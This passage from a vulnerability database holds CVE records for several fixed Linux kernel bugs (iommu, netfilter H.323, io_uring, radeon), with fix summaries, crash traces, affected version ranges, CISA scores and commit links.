"lessThan": "333fe86968482ca701c609af590003bcea450e8f",
"status": "affected",
"version": "586081d3f6b13ec9dfdfdf3d7842a688b376fa5e",
"versionType": "git"
},
{
"lessThan": "81e921fd321614c2ad8ac333b041aae1da7a1c6d",
"status": "affected",
"version": "586081d3f6b13ec9dfdfdf3d7842a688b376fa5e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/iommu.c",
"drivers/iommu/intel/pasid.c",
"drivers/iommu/intel/pasid.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/vt-d: Fix NULL domain on device release\n\nIn the kdump kernel, the IOMMU operates in deferred_attach mode. In this\nmode, info-\u003edomain may not yet be assigned by the time the release_device\nfunction is called. It leads to the following crash in the crash kernel:\n\n BUG: kernel NULL pointer dereference, address: 000000000000003c\n ...\n RIP: 0010:do_raw_spin_lock+0xa/0xa0\n ...\n _raw_spin_lock_irqsave+0x1b/0x30\n intel_iommu_release_device+0x96/0x170\n iommu_deinit_device+0x39/0xf0\n __iommu_group_remove_device+0xa0/0xd0\n iommu_bus_notifier+0x55/0xb0\n notifier_call_chain+0x5a/0xd0\n blocking_notifier_call_chain+0x41/0x60\n bus_notify+0x34/0x50\n device_del+0x269/0x3d0\n pci_remove_bus_device+0x77/0x100\n p2sb_bar+0xae/0x1d0\n ...\n i801_probe+0x423/0x740\n\nUse the release_domain mechanism to fix it. The scalable mode context\nentry which is not part of release domain should be cleared in\nrelease_device()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:51.621Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/333fe86968482ca701c609af590003bcea450e8f"
},
{
"url": "https://git.kernel.org/stable/c/81e921fd321614c2ad8ac333b041aae1da7a1c6d"
}
],
"title": "iommu/vt-d: Fix NULL domain on device release",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27079",
"datePublished": "2024-05-01T13:04:58.511Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T09:03:51.621Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26851 (GCVE-0-2024-26851)
Vulnerability from cvelistv5
Published
2024-04-17 10:17
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_conntrack_h323: Add protection for bmp length out of range
UBSAN load reports an exception of BRK#5515 SHIFT_ISSUE:Bitwise shifts
that are out of bounds for their data type.
vmlinux get_bitmap(b=75) + 712
<net/netfilter/nf_conntrack_h323_asn1.c:0>
vmlinux decode_seq(bs=0xFFFFFFD008037000, f=0xFFFFFFD008037018, level=134443100) + 1956
<net/netfilter/nf_conntrack_h323_asn1.c:592>
vmlinux decode_choice(base=0xFFFFFFD0080370F0, level=23843636) + 1216
<net/netfilter/nf_conntrack_h323_asn1.c:814>
vmlinux decode_seq(f=0xFFFFFFD0080371A8, level=134443500) + 812
<net/netfilter/nf_conntrack_h323_asn1.c:576>
vmlinux decode_choice(base=0xFFFFFFD008037280, level=0) + 1216
<net/netfilter/nf_conntrack_h323_asn1.c:814>
vmlinux DecodeRasMessage() + 304
<net/netfilter/nf_conntrack_h323_asn1.c:833>
vmlinux ras_help() + 684
<net/netfilter/nf_conntrack_h323_main.c:1728>
vmlinux nf_confirm() + 188
<net/netfilter/nf_conntrack_proto.c:137>
Due to abnormal data in skb->data, the extension bitmap length
exceeds 32 when decoding ras message then uses the length to make
a shift operation. It will change into negative after several loop.
UBSAN load could detect a negative shift as an undefined behaviour
and reports exception.
So we add the protection to avoid the length exceeding 32. Or else
it will return out of range error and stop decoding.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26851",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T17:33:25.792652Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T17:33:34.212Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.704Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98db42191329c679f4ca52bec0b319689e1ad8cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4bafcc43baf7bcf93566394dbd15726b5b456b7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ccd1108b16ab572d9bf635586b0925635dbd6bbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3c0f553820516ad4b62a9390ecd28d6f73a7b13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39001e3c42000e7c2038717af0d33c32319ad591"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/014a807f1cc9c9d5173c1cd935835553b00d211c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80ee5054435a11c87c9a4f30f1ff750080c96416"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/767146637efc528b5e3d31297df115e85a2fd362"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_conntrack_h323_asn1.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "98db42191329c679f4ca52bec0b319689e1ad8cb",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "4bafcc43baf7bcf93566394dbd15726b5b456b7a",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "ccd1108b16ab572d9bf635586b0925635dbd6bbc",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "b3c0f553820516ad4b62a9390ecd28d6f73a7b13",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "39001e3c42000e7c2038717af0d33c32319ad591",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "014a807f1cc9c9d5173c1cd935835553b00d211c",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "80ee5054435a11c87c9a4f30f1ff750080c96416",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "767146637efc528b5e3d31297df115e85a2fd362",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_conntrack_h323_asn1.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.17"
},
{
"lessThan": "2.6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_h323: Add protection for bmp length out of range\n\nUBSAN load reports an exception of BRK#5515 SHIFT_ISSUE:Bitwise shifts\nthat are out of bounds for their data type.\n\nvmlinux get_bitmap(b=75) + 712\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:0\u003e\nvmlinux decode_seq(bs=0xFFFFFFD008037000, f=0xFFFFFFD008037018, level=134443100) + 1956\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:592\u003e\nvmlinux decode_choice(base=0xFFFFFFD0080370F0, level=23843636) + 1216\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:814\u003e\nvmlinux decode_seq(f=0xFFFFFFD0080371A8, level=134443500) + 812\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:576\u003e\nvmlinux decode_choice(base=0xFFFFFFD008037280, level=0) + 1216\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:814\u003e\nvmlinux DecodeRasMessage() + 304\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:833\u003e\nvmlinux ras_help() + 684\n\u003cnet/netfilter/nf_conntrack_h323_main.c:1728\u003e\nvmlinux nf_confirm() + 188\n\u003cnet/netfilter/nf_conntrack_proto.c:137\u003e\n\nDue to abnormal data in skb-\u003edata, the extension bitmap length\nexceeds 32 when decoding ras message then uses the length to make\na shift operation. It will change into negative after several loop.\nUBSAN load could detect a negative shift as an undefined behaviour\nand reports exception.\nSo we add the protection to avoid the length exceeding 32. Or else\nit will return out of range error and stop decoding."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:57.098Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/98db42191329c679f4ca52bec0b319689e1ad8cb"
},
{
"url": "https://git.kernel.org/stable/c/4bafcc43baf7bcf93566394dbd15726b5b456b7a"
},
{
"url": "https://git.kernel.org/stable/c/ccd1108b16ab572d9bf635586b0925635dbd6bbc"
},
{
"url": "https://git.kernel.org/stable/c/b3c0f553820516ad4b62a9390ecd28d6f73a7b13"
},
{
"url": "https://git.kernel.org/stable/c/39001e3c42000e7c2038717af0d33c32319ad591"
},
{
"url": "https://git.kernel.org/stable/c/014a807f1cc9c9d5173c1cd935835553b00d211c"
},
{
"url": "https://git.kernel.org/stable/c/80ee5054435a11c87c9a4f30f1ff750080c96416"
},
{
"url": "https://git.kernel.org/stable/c/767146637efc528b5e3d31297df115e85a2fd362"
}
],
"title": "netfilter: nf_conntrack_h323: Add protection for bmp length out of range",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26851",
"datePublished": "2024-04-17T10:17:15.298Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:57:57.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41080 (GCVE-0-2024-41080)
Vulnerability from cvelistv5
Published
2024-07-29 15:04
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
io_uring: fix possible deadlock in io_register_iowq_max_workers()
The io_register_iowq_max_workers() function calls io_put_sq_data(),
which acquires the sqd->lock without releasing the uring_lock.
Similar to the commit 009ad9f0c6ee ("io_uring: drop ctx->uring_lock
before acquiring sqd->lock"), this can lead to a potential deadlock
situation.
To resolve this issue, the uring_lock is released before calling
io_put_sq_data(), and then it is re-acquired after the function call.
This change ensures that the locks are acquired in the correct
order, preventing the possibility of a deadlock.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.354Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b571a367502c7ef94c688ef9c7f7d69a2ce3bcca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73254a297c2dd094abec7c9efee32455ae875bdf"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41080",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:21:08.458402Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:59.495Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"io_uring/register.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b17397a0a5c56e111f61cb5b77d162664dc00de9",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "97ed7ff58de66c544692b3c2b988f3f594348de0",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "fdacd09f2ddf7a00787291f08ee48c0421e5b709",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "950ac86cff338ab56e2eaf611f4936ee34893b63",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "b571a367502c7ef94c688ef9c7f7d69a2ce3bcca",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "73254a297c2dd094abec7c9efee32455ae875bdf",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"io_uring/register.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.173",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.118",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.62",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.230",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.173",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.118",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.62",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix possible deadlock in io_register_iowq_max_workers()\n\nThe io_register_iowq_max_workers() function calls io_put_sq_data(),\nwhich acquires the sqd-\u003elock without releasing the uring_lock.\nSimilar to the commit 009ad9f0c6ee (\"io_uring: drop ctx-\u003euring_lock\nbefore acquiring sqd-\u003elock\"), this can lead to a potential deadlock\nsituation.\n\nTo resolve this issue, the uring_lock is released before calling\nio_put_sq_data(), and then it is re-acquired after the function call.\n\nThis change ensures that the locks are acquired in the correct\norder, preventing the possibility of a deadlock."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:37.834Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b17397a0a5c56e111f61cb5b77d162664dc00de9"
},
{
"url": "https://git.kernel.org/stable/c/97ed7ff58de66c544692b3c2b988f3f594348de0"
},
{
"url": "https://git.kernel.org/stable/c/fdacd09f2ddf7a00787291f08ee48c0421e5b709"
},
{
"url": "https://git.kernel.org/stable/c/950ac86cff338ab56e2eaf611f4936ee34893b63"
},
{
"url": "https://git.kernel.org/stable/c/b571a367502c7ef94c688ef9c7f7d69a2ce3bcca"
},
{
"url": "https://git.kernel.org/stable/c/73254a297c2dd094abec7c9efee32455ae875bdf"
}
],
"title": "io_uring: fix possible deadlock in io_register_iowq_max_workers()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41080",
"datePublished": "2024-07-29T15:04:17.642Z",
"dateReserved": "2024-07-12T12:17:45.633Z",
"dateUpdated": "2025-05-04T09:21:37.834Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41060 (GCVE-0-2024-41060)
Vulnerability from cvelistv5
Published
2024-07-29 14:57
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/radeon: check bo_va->bo is non-NULL before using it
The call to radeon_vm_clear_freed might clear bo_va->bo, so
we have to check it before dereferencing it.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.926Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2b201f83971df03c8e81a480b2f2846ae8ce1a3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9100f17428cb733c4f6fbb132d98bed76318342"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f13c96e0e325a057c03f8a47734adb360e112efe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a500b3a5f0a58c6f99039091fbd715f64f2f8af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fb15dcbcf4f212930350eaee174bb60ed40a536"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41060",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:22:11.951326Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:01.439Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/radeon/radeon_gem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e8d3c53c6f1cccea9c03113f06dd39521c228831",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a2b201f83971df03c8e81a480b2f2846ae8ce1a3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a9100f17428cb733c4f6fbb132d98bed76318342",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f13c96e0e325a057c03f8a47734adb360e112efe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8a500b3a5f0a58c6f99039091fbd715f64f2f8af",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6fb15dcbcf4f212930350eaee174bb60ed40a536",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/radeon/radeon_gem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.234",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.234",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/radeon: check bo_va-\u003ebo is non-NULL before using it\n\nThe call to radeon_vm_clear_freed might clear bo_va-\u003ebo, so\nwe have to check it before dereferencing it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:11.890Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e8d3c53c6f1cccea9c03113f06dd39521c228831"
},
{
"url": "https://git.kernel.org/stable/c/a2b201f83971df03c8e81a480b2f2846ae8ce1a3"
},
{
"url": "https://git.kernel.org/stable/c/a9100f17428cb733c4f6fbb132d98bed76318342"
},
{
"url": "https://git.kernel.org/stable/c/f13c96e0e325a057c03f8a47734adb360e112efe"
},
{
"url": "https://git.kernel.org/stable/c/8a500b3a5f0a58c6f99039091fbd715f64f2f8af"
},
{
"url": "https://git.kernel.org/stable/c/6fb15dcbcf4f212930350eaee174bb60ed40a536"
}
],
